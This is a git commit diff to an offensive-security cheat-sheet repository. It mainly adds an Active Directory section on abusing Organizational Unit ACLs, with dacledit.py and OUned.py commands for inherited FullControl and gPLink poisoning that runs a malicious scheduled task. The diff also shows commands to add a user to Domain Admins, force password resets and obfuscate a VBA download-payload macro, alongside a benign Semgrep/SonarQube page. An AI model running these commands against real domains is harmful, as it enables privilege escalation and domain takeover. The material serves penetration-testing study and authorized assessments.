Organizational Units ACL
parent
83df26c452
commit
5bc78524ea
|
@ -1,20 +1,24 @@
|
|||
# Active Directory - Access Controls ACL/ACE
|
||||
|
||||
* ACL: Access Control Lists
|
||||
* ACE: Access Control Entry
|
||||
An **Access Control Entry (ACE)** is a specific permission granted or denied to a user or group for a particular resource, such as a file or directory. Each ACE defines the type of access allowed (e.g., read, write, execute) or denied.
|
||||
|
||||
An **Access Control List (ACL)** is a collection of Access Control Entries (ACEs) associated with a resource.
|
||||
|
||||
* Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
|
||||
```ps1
|
||||
ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
|
||||
```
|
||||
```ps1
|
||||
ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
|
||||
```
|
||||
|
||||
* Automate ACL exploit [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn):
|
||||
```ps1
|
||||
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'
|
||||
```
|
||||
```ps1
|
||||
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'
|
||||
```
|
||||
|
||||
|
||||
## GenericAll/GenericWrite
|
||||
|
||||
### User/Computer
|
||||
|
||||
* We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it.
|
||||
* Windows/Linux
|
||||
```ps1
|
||||
|
@ -113,7 +117,8 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
|
|||
```
|
||||
|
||||
### Group
|
||||
* This allows us to add ourselves to the Domain Admin group :
|
||||
|
||||
* This ACE allows us to add ourselves to the Domain Admin group :
|
||||
* Windows/Linux:
|
||||
```ps1
|
||||
bloodyAD --host 10.10.10.10 -d example.lab -u hacker -p MyPassword123 add groupMember 'Domain Admins' hacker
|
||||
|
@ -250,6 +255,56 @@ An attacker can change the password of the user this ACE applies to:
|
|||
rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd"
|
||||
```
|
||||
|
||||
## Organizational Units ACL
|
||||
|
||||
Access rights granted on Organizational Units can be exploited to compromise all the objects that are contained in it.
|
||||
|
||||
* [synacktiv/OUned](https://github.com/synacktiv/OUned) - The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning
|
||||
|
||||
|
||||
### Non privileged objects
|
||||
|
||||
A user having the `GenericAll` right (and thus `WriteDACL` permissions) over an OU could add a `FullControl` ACE to the OU and specify that this ACE should be inherited, which will effectively lead to the compromise of all child objects since they will inherit said ACE.
|
||||
|
||||
* Grant `Full Control` on **SERVERS** OU
|
||||
```ps1
|
||||
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'username' -target-dn 'OU=SERVERS,DC=lab,DC=local' 'lab.local'/'username':'Password1'
|
||||
```
|
||||
|
||||
* Verify that we have `Full Control` ACL on **AD01-SRV1** inside **SERVERS**
|
||||
```ps1
|
||||
dacledit.py -action 'read' -principal 'username' -target-dn 'CN=AD01-SRV1,OU=SERVERS,DC=lab,DC=local' 'lab.local'/'username':'Password1'
|
||||
```
|
||||
|
||||
:warning: ACE inheritance from parent objects is disabled for `adminCount=1`
|
||||
|
||||
|
||||
### Privileged objects
|
||||
|
||||
**Requirements**:
|
||||
|
||||
- `GenericWrite` OR `Manage Group Policy` links
|
||||
- Create a machine account
|
||||
- Add new DNS records
|
||||
|
||||
|
||||
**Attack's Flow**: gPLink -> Attacker GPC FQDN -> GPT configuration files in Attacker SMB share -> execute a malicious scheduled task
|
||||
|
||||
* Edit the `gPLink` value to include a GPC FQDN pointing the attacker machine
|
||||
* Create a fake LDAP server mimicking the real one, but with a custom GPC
|
||||
* GPC's gPCFileSysPath value is pointing to the attacker SMB share
|
||||
* The SMB share is serving GPT configuration files including a malicious scheduled task
|
||||
|
||||
|
||||
**Exploit**:
|
||||
|
||||
Check this [blog post from Synacktiv](https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory) to correctly setup all the requirements for this attack to succeeded.
|
||||
|
||||
```ps1
|
||||
sudo python3 OUned.py --config config.ini
|
||||
sudo python3 OUned.py --config config.example.ini --just-coerce
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
@ -257,3 +312,5 @@ An attacker can change the password of the user this ACE applies to:
|
|||
* [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces)
|
||||
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
||||
* [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)
|
||||
* [OU having a laugh? - Petros Koutroumpis - 6 November, 2019](https://labs.withsecure.com/publications/ou-having-a-laugh)
|
||||
* [OUNED.PY: EXPLOITING HIDDEN ORGANIZATIONAL UNITS ACL ATTACK VECTORS IN ACTIVE DIRECTORY - Quentin Roland - 19/04/2024](https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory)
|
|
@ -0,0 +1,59 @@
|
|||
# Source Code Analysis
|
||||
|
||||
> Source code analysis is the process of examining and reviewing the code of a software program to identify errors, vulnerabilities, and potential improvements. This can be performed manually by developers or through automated tools that scan the code for issues like security risks, coding standard violations, and performance inefficiencies.
|
||||
|
||||
|
||||
## Semgrep
|
||||
|
||||
**Install**:
|
||||
|
||||
* Ubuntu/WSL/Linux/macOS: `python3 -m pip install semgrep`
|
||||
* macOS: `brew install semgrep`
|
||||
* Docker:
|
||||
```ps1
|
||||
docker run -it -v "${PWD}:/src" semgrep/semgrep semgrep login
|
||||
docker run -e SEMGREP_APP_TOKEN=<TOKEN> --rm -v "${PWD}:/src" semgrep/semgrep semgrep ci
|
||||
```
|
||||
|
||||
**Semgrep rules**:
|
||||
|
||||
* [semgrep/semgrep-rules](https://github.com/semgrep/semgrep-rules) - Official Semgrep rules registry
|
||||
* [trailofbits/semgrep-rules](https://github.com/trailofbits/semgrep-rules) - Semgrep queries developed by Trail of Bits
|
||||
* [Decurity/semgrep-smart-contracts)](https://github.com/Decurity/semgrep-smart-contracts) - Semgrep rules for smart contracts based on DeFi exploits
|
||||
* [0xdea/semgrep-rules](https://github.com/0xdea/semgrep-rules) - A collection of Semgrep rules to facilitate vulnerability research.
|
||||
|
||||
|
||||
## SonarQube
|
||||
|
||||
**Install**
|
||||
|
||||
* Docker: `docker run -d --name sonarqube -e SONAR_ES_BOOTSTRAP_CHECKS_DISABLE=true -p 9000:9000 sonarqube:latest`
|
||||
|
||||
**Configuration**
|
||||
|
||||
* Go to localhost:9000
|
||||
* Login with `admin:admin`
|
||||
* Create a local project
|
||||
* Generate a token for the project
|
||||
* Use `sonar-scanner-cli` with the generated token
|
||||
|
||||
```ps1
|
||||
docker run --rm -e SONAR_HOST_URL="http://10.10.10.10:9000" -v "/tmp/www:/usr/src" sonarsource/sonar-scanner-cli -Dsonar.projectKey=DDI -Dsonar.sources=. -Dsonar.host.url=http://10.10.10.10:9000 -Dsonar.token=sqp_redacted
|
||||
```
|
||||
|
||||
:warning: remove dead symbolic links before scanning a folder.
|
||||
|
||||
|
||||
## CodeQL
|
||||
|
||||
[TODO](#TODO)
|
||||
|
||||
|
||||
## Snyk
|
||||
|
||||
[TODO](#TODO)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [TODO](#TODO)
|
|
@ -14,6 +14,7 @@ List of penetration test reports and templates.
|
|||
|
||||
* [reconmap/pentest-reports](https://github.com/reconmap/pentest-reports) - Collection of penetration test reports and pentest report templates
|
||||
* [juliocesarfort/public-pentesting-reports](https://github.com/juliocesarfort/public-pentesting-reports) - A list of public penetration test reports published by several consulting firms and academic security groups.
|
||||
* [xanhacks/web-pentest-reports](https://gitlab.com/xanhacks/web-pentest-reports) - List of template vulnerability reports for web pentesting.
|
||||
|
||||
|
||||
## Vulnerability Report Structure
|
||||
|
|
|
@ -624,11 +624,11 @@ End Sub
|
|||
|
||||
### VBA Obfuscation
|
||||
|
||||
```ps1
|
||||
# https://www.youtube.com/watch?v=L0DlPOLx2k0
|
||||
$ git clone https://github.com/bonnetn/vba-obfuscator
|
||||
$ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin
|
||||
```
|
||||
* [bonnetn/vba-obfuscator](https://github.com/bonnetn/vba-obfuscator) [Youtube demo](https://www.youtube.com/watch?v=L0DlPOLx2k0)
|
||||
```ps1
|
||||
$ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin
|
||||
```
|
||||
* [trustedsec/The_Shelf/spinningteacup](https://github.com/trustedsec/The_Shelf/tree/main/Retired/spinningteacup)
|
||||
|
||||
|
||||
### VBA Purging
|
||||
|
@ -798,3 +798,4 @@ $ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
|
|||
* [Anti-Analysis Techniques Used in Excel 4.0 Macros - 24 March 2021 - @Jacob_Pimental](https://www.goggleheadedhacker.com/blog/post/23)
|
||||
* [So you think you can block Macros? - Pieter Ceelen - April 25, 2023](https://outflank.nl/blog/2023/04/25/so-you-think-you-can-block-macros/)
|
||||
* [MS OFFICE FILE FORMAT SORCERY - TROOPERS19 - Pieter Ceelen & Stan Hegt - 21 March 2019 ](https://github.com/outflanknl/Presentations/blob/master/Troopers19_MS_Office_file_format_sorcery.pdf)
|
||||
* [VenomousSway - VBA payload generation framework / Retired TrustedSec Capabilities - Trustedsec - May 22, 2024](https://github.com/trustedsec/The_Shelf/tree/main/Retired/venomoussway)
|
Loading…
Reference in New Issue